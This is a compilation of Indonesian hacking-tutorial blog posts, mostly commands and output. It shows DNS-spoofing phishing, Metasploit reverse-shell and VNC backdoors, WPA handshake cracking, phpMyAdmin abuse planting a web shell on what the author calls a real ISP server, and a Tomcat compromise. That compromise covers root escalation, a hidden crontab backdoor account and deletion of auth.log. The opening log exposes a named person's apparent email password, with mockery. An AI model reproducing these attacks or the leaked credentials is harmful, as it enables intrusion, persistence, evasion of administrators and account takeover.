dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-244.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
IMAP : 173.194.66.109:993 -> USER: cassa.prodigy@gmail.com PASS: m0twhnju4n22ees1985
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
DHCP: [F4:EC:38:99:60:F3] REQUEST 192.168.1.6
DHCP: [192.168.1.1] ACK : 192.168.1.6 255.255.255.0 GW 192.168.1.1 DNS 8.8.8.8 “”
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
Upz lagi spoofed om mirwan aka cassprodigy kena spoof kwwkkw.. maap2 om .. langsung ganti aja dah passwordnya
Kalau sudah pastinya jika korban membuka url facebook.com maka akan di redirect ke 192.168.1.6 dan menemukan login palsu kemudian akan memasukan user name berikut password..yang nantinya akan di rekam di file zeeganteng.txt

Ok sampai di sini dulu berhubung ane mau siap2 buat seminar besok.. nanti saya update lagi cara untuk menangkal dan menghindari serangan phissing ini..ok see u again ..

Source : Om Zee

Remote paksa kompi target

Sebelum kita membahasa tentang tehnik mendapatkan akses remote vlc via metasploit … sebaiknya teman-teman membaca ini postingan ini terlebih dahulu [..http://zeestuff.wordpress.com/2011/05/08/remote-windows-dengan-backdoor-exe/ ] karena postingan ini merupakan sambungan dari postingan tersebut.
Seperti pada postingan saya yang lalu mengenai remote windows dengan backdoor.exe kita sudah mendapatkan akses shell komputer target… Jadi anggapan saya anda telah berhasil pada tutorial saya yang pertama dan telah mendapatkan akses shell target dengan mengunakan NC ( netcat ) dalam hal ini saya spesifisikan sebagai berikut :

komputer penyerang
- ip addr : 192.168.1.34
- os : backtrack R2
komputer target
- ip addr : 192.168.1.33
- os windows xp sp2
Diakesnya shell via netcat akan membuka kita untuk mengakses komputer korban

powned windows with netcat

Langkah berikutnya kita harus membuat backdoor lagi .. hahaha maap ya.. kebanyakan bikin backdoor deh . Kalo pada tutorial sebelumnya kita membuat backdoor.exe yang di sisipi netcat kali ini kita buat backdoor via metasploit untuk membuka akses reverse_tcp yang nantinya akan membuat koneksi vnc …okey ..
ikuti langkah-langkah berikut ini
root@IBTeam:~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.34 LPORT=2482 x > /tmp/zee-ganteng.exe
ket : windows/vncinject/reverse_tcp —- payload yang di gunakan
LHOST = isikan ip anda
LPORT = isikan port yang memungkinkan ..
/tmp = direktori di mana kita akan mengesave backdoor …
mengapa di /tmp ? .. ya karena kita akan menggunakan fasilitas tftp ( default directory tftpd )
zee-ganteng.exe — nama backdoor , bisa gunakan nama sesuai kreasi ente
backdoor sudah tercipta

Seep tahap persiapan telah anda lewati .. sekarang mari kita exploitasi lebih lanjut.. . Pindahkan file backdoor yang barusan kita buat tadi ( zee-ganteng.exe ) ke komputer target . Dengan ap ? ya dengan TFTPD service .
aktifkan dengan
menu —–>  service —–> TFTPD —–> TFTPD —–> start TFTPD

Sekarang anda mengerti kenapa saya memilih directory /tmp untuk mensave backdoor .. ya karena home directory TFTPD secara default berada di sana… Lanjut kang
Untuk memindahkan backdoor tersebut bukanlah hal yang sulit ..
Pada shell windows tadi ketikan perintah :
tftp -i 192.168.1.34 GET /tmp/zee-ganteng.exe

Ok udah sukses perjalanan kita sampai di sini hehehe… sudah saatnya kita action sekarang … buka kembali shell pada tab baru .. masuk ke metasploit
root@IBTeam~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.34 RPORT=2428 DisabledCourtesySHell=true Ewindows/vncinject/reverse_tcpwindows/vncinject/reverse_tcp

Nah tinggal kita jalankan saja file backdoor reverse_tcp tadi

Perintah agar runnig hanya dengan menuliskan file yang hendak di esekusi terus enter.. perhatikan gambar di atas.
Setelah backdoor tersebut berhasil di aktifkan … we have the vnc server active

Bagi temen2 yang kurang jelas dengna tutorial ini. Silahkan mendownload video tutorial yang udah ane buat … just for share.. long live open source
video link :
http://www.ziddu.com/download/14923691/vnc.rar.html
watch online :
http://blip.tv/file/5128068

Source : Om Zee

Cracking enskripsi wireless wpa – wpa2 dengan cowpatty

backtrackers dimanapun anda berada kali ini saya akan membahas mengenai cara melakukan crack wiffi dengan cowpatty , hmm sebenarnya langkah-langkah untuk hacking wireless wpa dan wpe sudah banyak di bahas baik di blog ini maupun di forum. Karena itu saya coba untuk menjabarkannya perlahan di mulai dari serangan awal saja agar lebih di mengerti

1. Cek Support Interface

langkah pertama tentu saja kita membutuhkan interface wireless yang support terhadap mode monitor

cek kompetibilitas wireless

root@nindya-putri:~# airmon-ng

sip dilihat dari hasil di atas berarti interface wireless berbasis pada wlan0 telah support dengan mode monitor .. syarat 1 sukses ..

2.MODE MONITOR

Selanjutnya kita mengaktifkan mode monitor pada wlan0 …

root@nindya-putri:~# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)

Ok kita telah sukses sejauh ini , output pada terminal menunjukan bahwa monitor mode telah di aktifkan pada interface mon0

3. Berikutnya Kita harus menangkap (dump) traffik pada akses point target dan lalu lintas paket data antara AP dan client yang sedang terkoneksi , sebelumnya saya melakukan information gathering untuk mengetahui beberapa spesifikasi target yang di butuhkan

root@nindya-putri:~# airodump-ng mon0

Ok yang perlu kita catat dari pengumpulan informasi data yang di perlukan adalah ( dalam kasus saya )
a. bssid AP = 00:1E:C1:4C:BF:F8
b. channel = 11
c. ENC = WPA
d. SSID = ibteam-3g

4. AIRODUMP-NG

Selanjutnya saya melakukan dump trafik data antara client terkonek dan Akses point (AP)

root@nindya-putri:~# airodump-ng --bssid 00:1E:C1:4C:BF:F8 -w dump_traf1 -c 11 mon0

saya jelaskan sedikit mengenai -w dump_traf1 ..parameter ini berfungsi untuk membuat suatu file hasil capture dan dump trafik tadi, dump_traf1 adalah nama file yang saya pilih anda bebas memilih nama lain sesuka hati anda. Dan file tersebut nantinya akan berekstension .cap. Tentu saja file tersebut akan di buat pada lokasi direktori dimana anda memulai perintah airodump.

5. Handshake

Tujuan kita dalam capturing ini sebenarnya adalah mencari handshake. Untuk mendapatkan nilai handshake kita harus mendiskoneksikan client yang sudah terkoneksi dengan baik ke AP target. ok saya tertarik pada client yang telah terkoneksi dengan AP dengan ssid ( ibteam-3g ) dengan bssid F4:EC:38:99:60:F3. Kita gunakan fasilitas aireply untuk melakukan deauth attack.

root@nindya-putri:~# aireplay-ng --deauth 1 -a 00:1E:C1:4C:BF:F8 -c F4:EC:38:99:60:F3 mon0

ok perhatikan pada gambar di bawah ini , bahwa setelah aireplay-ng di esekusi kita mendapatkan handshake .. karena dalam keadaan terenskripsi , time to crack it !!

6. cowpatty action

Ok kita sudah di pastikan mendapat file capture handshake yang tersimpan pada direktori di mana anda memulai capturing dengan airodump tadi. masih ingatkan tadi saya simpan dengan nama dump_traf1 akan tersimpan otomatis dengan nama dump_traff1-01.cap.

Untuk melakukan crack kita membutuhkan file hash (genpmk)

root@nindya-putri:~# genpmk -f pass.txt -d tes_genpmk_hash_wpa -s ibteam-3g -v

oh iya jgn lupa bahwa anda membutuhkan password list (dictionary) .. yang nantinya menjadi nilai dari parameter -f. Pada kasus saya kali ini saya telah menyiapkan password list dalam folder yang sama.saatnya kita mengolah file-file baik hasil capture, hashing dan password list dengan cowpatty

cowpatty -s ibteam-3g -f pass.txt -d tes_genpmk_hash_wpa -r dump_traf1-01.cap -v,

dimana parameternya
 -s ( ssid AP target )
 -f ( lokasi file password list dictionary )
 -d ( hasil hashing password list dictionary dengan genpmk )
 -r ( hasil capturing handshadke dengan airdump )
 -v ( verbose output )

ok kita lihat sebenarnya hal tersebut tidaklah sesulit yang anda duga. pada gambar sudah tampak hasil cracking enskripsi wpa dari cowpatty.

Saatnya saya undur diri… saya dan semua kerabat yang bertugas ( laptop, pc, mouse, pc-speaker ) mengucapkan terima kasih atas keberadaan anda.. tetap setia mengikuti blog saya ini… maju terus IT Indonesian .. SALAM BACKTRACKERS !!!

Source : Om Zee

akibat kelalaian dari aplikasi phpmyadmin

Akibat dari kelalaian aplikasi phpmyadmin yang tidak di password atau terinstall secara asal-asalan ternyata fatal .. kali ini ane posting mengenai bagaimana modus seorang attacker dalam melakukan penyisupan dengan memanfaatkan kelemahan aplikasi phpmyadmin
Apa itu phpmyadmin ? setahu saya phpmyadmin adalah aplikasi yang di gunakan dalam pengoperasian mysql melalui web environment. Karena memang pengoperasian mysql dari command line masih tergolong sulit. Ok coba ane bahas kronologis akibat dari hal ini.
1. Target yang memiliki kelemahan dalam aplikasi phpmyadmin
Begitu saya membuka url target .. hupfftt ternyata phpmyadminnya terbuka… ya saya lanjutkan dengan mengexploitasi…kenapa langsung terbuka? karena secara default phpmyadmin terinstall tanpa menggunakan password .. username:root password:no biasanya hal ini terjadi ketika windows user menginstall xampp secara default.


Kemudian saya coba buat database baru dengan nama tes.. kemungkinan nalar saya mengatakan bahwa sang admin gk akan curiga dengan database bernama tes.. karena saya sendiri sering membuat database dengan nama seperti itu untuk melakukan testing database pada phpmyadmin
2. Mengetahui dengan pasti aplikasi webserver yang di gunakan target. ( INFORMATION GATHERING )
Aplikasi webserver kan bermacam-macam .. sesuai dengan operatingsystem yang dipakai.. sebut saja apache, nginx yang biasanya ada pada sistem linux dan xampp yang berada pada sistem windows.. untuk mengetahui dengan pasti aplikasi yang di pakai biasanya attacker akan mencari tau aplikasi yang dipakai. Pada kasus ini saya tinggal membuka halaman index dan terlihat xampp secara default

Hmm terlihat jelas sekali bahwa sistem operasi yang di pakai ada windows dan aplikasi web server yang dipakai adalah xampp. Pada kasus yang berbeda nntinya anda tinggal akan mengganti lokasi-lokasi dir default dari berbagai aplikasi web server.
3. Mengesekusi query untuk membuat file upload
Nah seperti yang kita tau , mysql memiliki beberapa perintah-perintah dalam bentuk query atau sql syntax, nah dengan memanfaatkan kesempatan tersebut, attacker akan membuat sebuah perintah-perintah query dengan tujuan tertentu
caranya ?
Saya masuk ke database “test” yang baru saja saya buat kemudian saya buka sql dan memasukan query-query di bawah ini

use mysql;
 DROP TABLE IF EXISTS `temptab`;
 CREATE TABLE temptab (codetab text);
 INSERT INTO temptab (codetab) values ('
 Upload file :');
 SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab;
 DROP TABLE temptab;
 FLUSH LOGS;

Perintah di atas sebenarnya bertujuan untuk membuat file bernama form.php yang nntinya digunakan attacker untuk meupload file backdoor. Perhatikan sytax html pada form dengan action=”upload.php” yup tebakan anda benar … kita harus membuat file upload.phpnya yang menjadi esekutor.
Kita ulangi kembali langkah tadi kemudian masukan query di bawah ini untuk membuat file upload.php

use mysql;
 DROP TABLE IF EXISTS `temptab`;
 CREATE TABLE temptab (codetab text);
 INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "
 ";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "
 ";?>');
 SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
 DROP TABLE temptab;
 FLUSH LOGS;

Tinggal neken tombol “GO” nah sebenarnya dilihat dari perintah maka kita akan membuat file tersebut didalam direktori web default xampp yaitu “c:/xampp/htdocs/” dan dengan kedua query tadi attacker telah membuat 2 file dalam dir c:/xampp/htdocs/ yaitu “form.php” dan “upload.php”
4. Upload file backdoor ( EXPLOITATION )
Kemudian attacker tinggal membuka file form.php untuk mengupload file berikutnya… karena di upload pada direktori utama pada xampp di dir “htdocs” maka attacker tinggal membuka url http://situstarget/form.php

yup dari sini sudah di buka form upload di mana anda dapat melakukan langkah selanjutnya. Ane mencoba mengupload file backdoor.php modipan om james0baster yang dikenal dengan nama 404.php…ternyata berhasil.

yup sejauh ini anda sudah menjadi “admin” karena dilihat dari informasi yang di hasilkan 404.php anda berprivilage admin.. mengingat memang windows menginstall xamp lewat privilage admin
Apakah attacker akan berhenti sampai disini ? tentu saja tidak .. attacker akan berusaha untuk mendapatkan akses lebih dalam lagi .. dalam hal ini sangat dimungkinkan mesin disusupi remote backdoor.
5. REMOTE BACKDOOR ( MAINTAINING ACCESS )
Ok seperti yang saya bilang attacker tidak akan puas sebelum anda benar2 terOWNED !!! karena itu saya coba buat backdoor dengan menggunakan fasilitas payload

root@eichel:~# msfpayload windows/shell/reverse_tcp LHOST=1xx.xxx.xxx.xxx x > /tmp/zee.exe
 Created by msfpayload (http://www.metasploit.com).
 Payload: windows/shell/reverse_tcp
 Length: 290
 Options: {"LHOST"=>"1xx.xxx.xxx.xxx"}
 root@eichel:~# msfpayload windows/meterpreter/reverse_tcp LHOST=1xx.xxx.xxx.xxx x > /tmp/susan.exe
 Created by msfpayload (http://www.metasploit.com).
 Payload: windows/meterpreter/reverse_tcp
 Length: 290
 Options: {"LHOST"=>"1xx.xxx.xxx.xxx"}

hehehe backdoor bernama “susan” sudah siap digunakan. Backdoor tersebut kemudian saya upload lewat shell 404.php tadi ..

Tinggal saya jalankan metasploit listernernya di backtrack saya

Kemudian attacker akan mengesekusi file remote backdoor melalui shell. Dalam kasus ini saya mencoba esekusi file susan,exe melalui backdoor 404.php

Dan meterpreterpun terbuka.. sebenarnya ini termasuk dari tehnik penyerangan melalui NAT yang sering ditanya2 di forum.. hanya dengan ip publik vs ip publik kita bisa melakukan hal ini.

jiahh kita lihat proses berjalan pada server target …

Dilihat dari prosesnya ada 2 antivirus sedang berjalan .. hmmm

1280 DefWatch.exe x86 0 C:\Program Files\Symantec AntiVirus\DefWatch.exe
 1308 explorer.exe x86 0 ADMIN\Admin C:\WINDOWS\Explorer.EXE
 1316 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
 1336 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe
 1340 hkcmd.exe x86 0 ADMIN\Admin C:\WINDOWS\system32\hkcmd.exe
 1364 postgres.exe x86 0 C:\Program Files\PostgreSQL\9.0\bin\postgres.exe
 1400 YahooAUService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
 1520 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
 1552 pds.exe x86 0 C:\WINDOWS\system32\CBA\pds.exe
 1584 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
 1672 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
 1684 igfxpers.exe x86 0 ADMIN\Admin C:\WINDOWS\system32\igfxpers.exe
 1708 SM?RTP.exe x86 0 ADMIN\Admin C:\Program Files\Smadav\SM?RTP.exe

Ternyata antivirusnya kyknya gk diupdate atau bajakan ?.. hanya ALLAH yang tau !
Adanya proses yahoo messangger membuat saya penasaran .. siapa tau bisa liat2 percakapn gitu hahaha.. akhirnya saya melakukan migrating ke proses explorer.exe yaitu pada pid 1308 kemudian melakukan vnc backdoor injection

dan remote-desktop melalui vnc stagger pun terbuka …dan saya bahkan dapat mengontrol / meremote desktop server target dari jauh !!

Ternyata server yang kita pentest barusan itu adalah server ISP ( internet service provide ) yang membagi-bagi bandwidth .. semoga admin dari perusahaan tersebut melihat postingan ini kemudian memperbaiki celah tersebut…:P
Langkah terakhir saya mencoba memasuki cmd shell dari server tersebut ..

Ok server ini ter-owned sepenuhnya …
Pelajaran yang harus kita tarik bersama dari postingan ini
1. Hati-hati terhadap aplikasi phpmyadmin anda .. pastikan berpassword.. kalau perlu tidak menggunakan aplikasi2 tersebut .. gunakan command line .. ingat akan SBL-CL! and say no to GUI !
2. Wahai engkau pengguna windus,… bertobatlah dan gunakan windows asli serta berbagai aplikasi asli. Karena biar bagaimanapun Allah tidak ridho kepada para pembajak dan pencuri !! mau make aplikasi dan os mudah .. tapi gk mau keluar modal..!!! LINUX ADA UNTUK MENJAWAB MASALAH ANDA DAN MENGHINDARKAN ANDA DARI DOSA PEMBAJAKAN.. aminnnn…
saya zee eichel mohon undur diri dari hadapan anda …

Source : Om ZEE

TOMCAT ternyata memang berbahaya… bahkan bisa menusuk jiwa …

dari judulnya ane rasa memang sangat menarik, betapa kita tau beberapa waktu ini , Indonesia di kejutkan dengan adanya tomcat. Serangga yang mampu memberikan rasa melepuh terhadap kulit manusia. Ok ternyata tomcat seperti ini juga terdapat di dalam dunia IT. vulnerability yang sangat berbahaya .. Pada kesempatan ini ane mau membahas sebuah simulasi hacking yang ane beri judul ..
“TOMCAT DEADLY BITE”
PRESIMULATION
= apa itu tomcat ?
tomcat adalah web server yang didevelop oleh apache group. Biasanya tomcat di install berpasangan dengan web server apache untuk di jadikan web proxy.
Ok spesifikasi simulasi ini
1. Information gathering
2. Bruteforcing
3. Backdooring ( exploitation )
4. Privilage Escalation
5. Maintaining access
Ok kita mulai saja

1. Information gathering

Untuk mengumpulkan informasi kita gunakan nmap.. kali ini saya mencoba untuk melakukan nmap untuk melihat berapa host yang up


karena sebagai simulator tentunya saya sudah mempersiapkan target… kali ini target kita ada ip 192.168.1.6 berbasis sistem ubuntu server

perhatikan pada baris

8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

Sudah terlihat server target memiliki service apache tomcat running di port 8080…

2. Bruteforcing

Pada dasarnya tomcat memiliki halaman administrator yang akan memungkinkan kita mengakses panel adminnya. untuk itu saya gunakan metode bruteforcing untuk mendapat akses tersebut. Kali ini saya pakai medusa. Artikel tentang bruteforcing medusa sudah banyak saya bahas.
Karena medusa membutuhkan user.list dan pass.list maka saya telah membuatnya terlebih dahulu …

root@eichel:~# cat usertomcat
 tes
 test
 admin
 money
 administrator
 dodol
 admin1
 admin123
 admin1234
root@eichel:~# cat passwordtomcat
 test
 tes
 monkey
 manager
 admin
 manager
 command
 tes1
 admin123

ok berbasis dua file tersebut saya mencoba melakukan bruteforcing …dengan asumsi

(-M) modul = http
 (-h) host, ip atau nama
 (-U) usename.lst ( kamus )
 (-P) password.lst ( kamus )
 (-e ns) [n] =coba tanpa password, [s] kemungkinan password = username
 (-n) port
 (-m) direktori path ( manager/html adalah default admin page dari tomcat )

dari sekian banyak percobaan ternyata salah satu sukses..

ok kita dapatkan sukses pada user : admin dan pass : admin

kita buka di browser 192.168.1.6:8080

kemudian masuk ke 192.168.1.6:8080/manager/html masukan user:pass = admin:admin

ok anda berhasil memasuki panel admin tomcat.

3. Backdooring ( exploitation )

Langkah selanjutnya attacker akan membuat trigered payload untuk membuat koneksi ke shell target. Hmm tujuan agar kita dapat mengekusi langkah selanjut dengan mulus dan perlu memasuki system korban walau hanya dengan user non aktif. Dalam hal ini saya memakai metasploit

ingat tadi seperti yang kita tahu bersama bahwa sistem target menggunakan linux x86 karena itu payload saya atur ke linux x86 dengan LHOST = ip attacker ( 192.168.1.10 ) dan menggunakan port 4545 untuk membangun bind connection reverse tcp
PREPARING FOR LISTENER
ok kita buka msfconsole kita kemudian menggunakan exploit/multi/handler dengan opsi-opsi yang dicocokan dengan backdoor.war yang telah kita buat pada langkah sebelumnya …

hmm pastikan opsi – opsi sudah benar …

saatnya kita jalankan listener …

UPLOAD BACKDOOR.WAR INTO THE TARGET DIRECTORY
sekarang kita akan mengupload kenadeh.war yang telah kita buat dengan msfpayload tadi .. ok pada panel admin tomcat server target anda sudah seharusnya melihat adanya form upload dengan ekstensi war file. ok kita upload dari dir kita menuju ke dir target. pilih file yang hendak di upload kemudian klik deploy..

jika kita berhasil menguploadnya, war file adalah file ekstrakan seperti halnya zip, rar , dll. sistem tomcat dengan otomatis akan mengekstrak file war dalam hal ini “kenadeh.war” sehingga akan terbentuk sebuah direktori “kenadeh“. Dalam tomcat ini disebut sebagai istilah “deploy“

Seperti yang sudah saya jelaskan sebelumnya bahwasanya file war itu adalah file archive.. karena itu kita harus tau nama backdoor triggering yang sebenarnya. Adabaiknya kita ekstrak di host kita terlebih dahulu sehingga kita tahu kita harus memanggil file dengan nama apa.

root@eichel:~# unzip kenadeh.war
 Archive: kenadeh.war
 inflating: META-INF/MANIFEST.MF
 inflating: WEB-INF/web.xml
 inflating: cazyptnwpvlazb.jsp
 inflating: CBMazgyh.txt

hmm perhatikan file dengan ekstensi jsp. disitulah anda akan memanggil backdoor anda… kita tidak perlu mengekstrak file war di server target.. ingat tomcat telah melakukan ekstrak secara otomatis.. karena itu sudah dipastikan file cazyptnwpvlazb.jsp telah berada pada direktori tomcat dan siap diesekusi.
Kehebatan backdoor ini adalah tidak perlu adanya social enggineering karena backdoor tidak perlu diesekusi oleh user sistem target. group nobody/world pun sanggup memicu backdoor. sehingga attacker akan memicu backdoor tersebut dengan mengakses url backdoor maka attacker tidak perlu menunggu lama untuk membuka shell aktif..
http://192.168.1.6:8080/kenadeh/cazyptnwpvlazb.jsp
shell pun terbuka

4. Privilage Escalation

kita ketik “shell” untuk mengakses cmd server… ok sekarang dengan perintah id saya tau bahwa saya menggunakan akses user tomcat , dan gid = tomcat.

okey terlihat gambar di atas bahwa informasi kernel sudah kita dapatkan ,

uname -a
 Linux ubuntu 2.6.35-02063504-generic #201008271919 SMP Fri Aug 27 20:27:22 UTC 2010 i686 GNU/Linux

Untuk mempermudah sya dalam mengeksploitasi maka saya teringat akan postingan om ekawithoutyou mengenai spawning bash pada http://forum.indonesianbacktrack.or.id/showthread.php?tid=2108 yang memungkinkan kita mengaktifkan /bin/bash atau bin/sh. Saya lebih senang dengan bin/bash heheheh

ok dilihat dari kernelnya tampaknya exploit kernel tersebut sangat mudah untuk didapatkan …kita tinggal harus mengupload backdoor tersebut, karenanya saya mencoba mencari direktori yang writetable untuk user tomcat ini..

Kemudian attacker tinggal mengupload exploit dengan fasilitas ‘wget‘

Sperti pada gambar di atas. attacker mengupload exploit kemudian menambahkan +x pada permission sehingga file tersebut sudah siap di jalankan. Exploit yang di upload ada baiknya sudah di compilasi dari script.c Mengingat tidak semua server memiliki gcc yang terinstall. Sehingga exploit kali ini sudah di kompilasi terlebih dahulu dari script c.
Kemudian attacker hanya tinggal mengesekusi file tersebut …

dan holaaa id=root gid=root ..

5. Maintaining access

Biasanya attacker akan berusaha untuk tidak meninggalkan jejak serta mengecoh sysadmin kemudian membuat dirinya sebuah akses tertentu untuk memasuki system tersebut di lain waktu …
Dalam hal ini saya memberikan sebuah contoh yang dulu sering saya lakukan ketika berhasil melakukan rooting. saya memanfaatkan crontab atau sebuah sistem task yang otomatis berjalan yang dapat ditentukan kapan sistem akan mengesekusinya. Kalau pada sistem windows kita sering mendengar automatic task. Saya akan membuat sebuah script.sh penambahan user.. hmm sebelumnya saya akan mencari tau kira-kira group-group apakah yang memiliki akses sudoers…

root@ubuntu:/var/lib/tomcat6/shared# cat /etc/sudoers
 cat /etc/sudoers
 ...
 #includedir /etc/sudoers.d
# Members of the admin group may gain root privileges
 %admin ALL=(ALL) ALL
 ...
 root@ubuntu:/var/lib/tomcat6/shared#

Ok dilihat dari keterangan pada /etc/sudoers bahwa grou admin adalah group yang memiliki hak “sudoers” , bermodal ini saya akan membuat system.sh untuk keperluan maintaining akses. Attacker biasanya akan memilih dir-dir yang sulit dideteksi .. dan membuat dir tersebut tersamar .. karena itu saya membuat sebuah dir di dalam /etc/perl/CPAN

root@ubuntu:cd /etc/perl/CPAN
root@ubuntu:/etc/perl/CPAN#

hmm setelah kita cukup membuat sebuah direktori yang sulit di deteksi .. saya membuat sebuah 2 buah file script.sh
isinya adalah sebagai berikut …yang pertama saya beri nama auth.sh

useradd admin -G admin -p saOhMg4WOk7iY -d /etc/perl/CPAN/.../.../ -s /bin/bash

sebenarnya isinya simple kok .. yaitu membuat user admin di bawah group sudoers admin dan berhomebase pada /etc/perl/CPAN/…/…/  tipe shell adalah /bin/bash. mungkin anda bertanya dari mana saya dapet ‘saOhMg4WOk7iY‘ itu enskripsi salt agar kita dapat langsung memberi user buatan kita password dalam satu perintah …cara dapetnya

root@eichel:~# perl -e 'print crypt("150787", "salt"),"\n"'
saOhMg4WOk7iY

yang kedua kita beri nama antifor.sh
isinya adalah

#/bin/bash
 rm -rf /var/log/auth.log
 touch /var/log/auth.log
 userdel admin

hmm saya kreasikan dengan menghapus /var/log/auth.log dimana tiap otentifikasi user-user tercatat disana. kemudian membuat auth.log baru serta menghapus user admin. Kedua script tersebut akan kita jadwalkan pada crontab sistem target.
kita buat file crontab yang nntinya akan kita imput kedalam kita beri nama crontab

01 23 1,7,14,21 1-12 * /etc/perl/CPAN/.../..././auth.sh
01 0 2,8,15,22 1-12 * /etc/perl/CPAN/.../..././antifor.sh

file crontab itu menunjukan bahwa sistem secara otomatis akan mengesekusi file auth.sh tiap menit pertama pada jam 23 ( 11 malam ) dan berlaku pada tanggal 1,7,14,21 setiap bulan. baris dua cuma ane bedakan 1 hari sehingga anda tau bahwa user anda siap tiap tanggal tanggal 1,7,14,21 karena besoknya secara otomatis sistem akan menghapus user tersebut. Hal ini akan mengecoh sisadmin sehingga jika sisadmin lengah maka attacker terus mendapatkan akses masuk ssh dengan user privilage sudoers
ok , kita upload semua file tersebut ke dir yang telah kita buat…kebetulan ketiga file telah saya zip

root@ubuntu:/etc/perl/CPAN/.../...# wget http://192.168.1.10/auth.zip
 wget http://192.168.1.10/auth.zip
 --2012-04-12 12:47:38-- http://192.168.1.10/auth.zip
 Connecting to 192.168.1.10:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 852 [application/zip]
 Saving to: `auth.zip'
100%[======================================>] 852 --.-K/s in 0s

2012-04-12 12:47:39 (51.8 MB/s) - `auth.zip' saved [852/852]

Kemudian jgn lupa untuk men-chmod 777 ke seluruh file

langkah terakhir kita aktifkan crontab buatan kita :p

selamat anda telah berhasil melakukan tahap maintaining access …ketika pada waktunya user anda akan aktif ..

root@eichel:~# ssh admin@192.168.1.6
 admin@192.168.1.6's password:
 Added user admin.

tambahan : waktu crontab bisa anda modif.. ya sesuai kebutuhan lah.. siapa tau demi mengkamuflase admin anda menjadwalkan user anda aktif dalam waktu 1 bulan satu kali.
CLEAR LOG
yang perlu di perhatikan disini adalah

1.log tomcat
 root@ubuntu:/var/log/tomcat6# ls
 ls
 catalina.2012-04-11.log catalina.out localhost.2012-04-12.log
 catalina.2012-04-12.log localhost.2012-04-11.log
 root@ubuntu:/var/log/tomcat6# cat localhost.2012-04-12.log
 cat localhost.2012-04-12.log
 Apr 12, 2012 7:04:26 AM org.apache.catalina.core.ApplicationContext log
 ---
 INFO: HTMLManager: undeploy: Undeploying web application at '/kenadeh'
 ---

ok semoga tutorial ini berguna bagi teman-teman semua… akhir kata saya undur diri dari hadapan anda .. salam backtrackers…

Source : Om Zee